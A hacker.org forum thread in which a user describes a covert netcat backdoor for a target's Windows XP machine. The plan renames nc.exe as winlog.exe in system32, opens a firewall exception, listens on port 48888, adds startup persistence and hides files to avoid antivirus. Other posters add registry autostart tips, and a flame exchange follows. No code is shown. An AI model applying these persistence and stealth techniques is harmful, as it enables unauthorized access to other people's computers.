hacker.org

Well, I was browsing through Liidian's post (http://www.hacker.org/forum/viewtopic.php?t=2379) and I thought it would be fun to freak someone out with it... a retard that thinks he knows about computers when he can't program his way out of a paper bag. So I came up with a bit of a "trojan", which isn't actually mine, but I modified it a bit... the code is from netcat's tutorials
As you sure have guessed, winlog.exe is nc.exe renamed

Legal stuff: This is for education / curiosity reasons ONLY. If you use it for illegal activities you are on your own and none else but you is responsible.

My mods are to actually get nc to run in the backround, and even bypass Windows firewall if run from an admin shell.
I also extract the PC data to connect to it at my leisure (the concept is simple: plug the usb memory stick, execute the file, unplug, leave) and copy it to system32 because regular users rarely ever touch this thing, and the renamed file looks totally legitimate there, along winlogon.exe which BTW is a Windows essential procedure and can't be terminated . Also, system32 is by default in the path command, along with the windows directory, do I can execute it from everywhere in the pc. You get where I am going?
What this misses is the simple fact that I have to make it run every time the user starts the pc. I know that the obvious choice is the startup folder, but it is located at the user's personal folder, hence the problem: Is there any scripting adept out there who can enlighten me with the proper %what-should-I-put-here% thing, so I can just do:
copy StartEveryTime.bat %whatever%\startup ?
Also, I need another command to change the folder settings to NOT show hidden files. That way he/she won't ever take notice .
For now I have to do both of the aforementioned actions manually. So today I ask the help from any mischievous script guru and enthusiast.

Besides the startup folder. There is another, more hidden, way to auto-start in windows: the registry.

http://www.doshelp.com/HowToView/Registry_Keys.htm


This has a couple of advantages:
- It is user independent.
- It's more hidden. Everybody knows the startup-folder; the registry key is less known and harder to look up.
- You don't have to not show hidden files.


I'm not quite sure if it is possible to add a reg-key from a .bat script; but you can always write a program to do this.

Well, I didn't consider the registry from the very beginning, for the same reasons that I want this to go that way: it can be traced by the PC with various programs, and it is way more suspicious in automated scans. Besides, most computers only have one user, and that user has administrator rights. But hat tip to you about that, the link is useful for other stuff too, maybe I'll need it to edit other things to make the program run smoother, like disabling the commercial firewalls or something (I'll have to research on that one).
The point here is to create a waiting listening port and get enough data to connect to it. (I think I'll try to make a reverse-bind edition a bit later, depending on my schedule) There can be many things that go wrong, like a hardware firewall or a commercial firewall, or even another OS (this one is tried successfully on a Windows XP SP 2 & 3 box ONLY!). The point here is to make it as stealthy to as many detectors as possible. Usually when editing the registry, things can go bananas quite easily (EVERY time you edit the registry, you are advised to keep a backup) and if there is an antivirus running it can set off bells (along with a nasty and attention-getting beep) and freeze the whole process. That risk is the reason I decided to go about it more conventionally. Just create an exception on the XP firewall, run the nc to listen to port 48888, and wait, in the background. If I just copy a batch file in the startup folder (or even replace an existing one - hmmmm this is a good idea, it adds some extra stealth ) and netcat renamed the antivirus doesn't have any reason to go off. Editing the registry, ESPECIALLY in the startup section, is the de facto signature of malware.
Anyway, your opinion is appreciated, I will try to experiment down that road, but I have to say I don't expect much at the end of that tunnel.

Sorry i was retarded and wrote something stupid because i did not fully understand the post itself. I take all accusions of being retarded in this case because i truly was, sorry.

Mr. Liidian, with this kind of excessive trolling it is no wonder you get flamed and taken as a "retard" as you say it. Also, your posts tend to be especially unproductive ones, with this one being a very good example. Also, my "bullshit" post is something I did in my free time just for *education* purposes, so if you just can't get that in your head, then there is really any point in further explaining the already obvious.
Also, please remind me of when I actually called YOU a "retard". If you had actually READ my first post then you would SURELY understand that

Well, I was browsing through Liidian's post (http://www.hacker.org/forum/viewtopic.php?t=2379) and I thought it would be fun to freak someone out with it... a retard that thinks he knows about computers when he can't program his way out of a paper bag.

That's right, the retard is the one to get freaked out, not you. Ooooh, the obvious revelation.
And no, I am not going to report your post, I will just let it standing there as a memorial of how you speak before you think (or read in this case). Don't just skim read, read the damn details. Also, throwing "challenges" not only betrays childish behavior, but is also attracting loads of flames. If you felt insulted, you could just PM me and we could talk this out like civilized people (yea it works this way too) but you chose to just post your flame here and throw something that offends many people. Reeeeeal smart and mature move.

And of course you could just figure out that this very post was made inspired by *your* script, so the chance to actually mock you was quite small? It seems I was mistaken about you, Mr. Liidian, so unless you have come here to share some of your 5-year knowledge in certain scripting language, stop trolling and flaming and be quiet.

P.S. To everyone else, I apologize for my language on this post, but I surely hope you understand the circumstances.

GeorgeTI wrote:
That's right, the retard is the one to get freaked out, not you.

Oh im sorry, now this is really embarrassing. Sigh....
I am really by all my heart, sorry i didn't watch what post you linked i just thought you tried flaming me about infecting computers with trojans etc where everyone flamed me. I am truth fully sorry and i'll keep my mouth shut. :< I'll delete my post btw..

Edit: this is extremly stupid from now on i'll read everything to it's full content without thinking i know what it is going to say. I hope you can forgive me GeorgeTI....

Apology accepted. Now on to the pressing matter, shall we?
I found out how to actually hide the file, now what I need is a way to actually run a few more goodies in the background.
I think of running netcat in both a listen and a connecting manner. That way, if you have preset your computer, you can just come there and the connection will already be in place, waiting for you ^^.
I just need to do some research - the [updated] script seems to work well on Windows XP environments, or even some Vista systems, but it needs a lot of tweaking to get things done. I also need to find the registry key to set the command prompt window to fullscreen for the maximum laughs.
Anyone knows that specific key? Much obliged.
Another good old trick is to make the thing beep like hell, for maximum effect a nice screaming sound will do nice, but I haven't dug into the beep command hard enough for that.
Anyway, I intend to publish this here once it is finished, or publish the url where it is hosted - who knows, it may even become popular prank (^^)V

Seems this little idea got me down a dark path, for the final thing that I made was a heck of a lot more blackhat, a heck of a lot more dangerous and a heck of a lot more damaging.
Still it was fun.
Anyway, I decided to host it at another site, as it isn't something innocent now...